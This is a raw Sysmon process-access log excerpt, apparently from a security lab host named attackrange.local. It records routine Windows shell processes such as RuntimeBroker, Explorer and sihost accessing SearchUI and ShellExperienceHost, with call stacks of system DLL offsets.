13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x800000000000000012202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+18280|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.633{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.586{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.586{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.586{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.586{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.586{59A5CD1D-93F9-6005-F204-00000000A301}42963788C:\Windows\system32\sihost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+72b5|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.586{59A5CD1D-93F9-6005-F204-00000000A301}42963788C:\Windows\system32\sihost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.586{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.586{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.586{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6d1f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+68be|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6966|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6ab5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000012188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.586{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.586{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 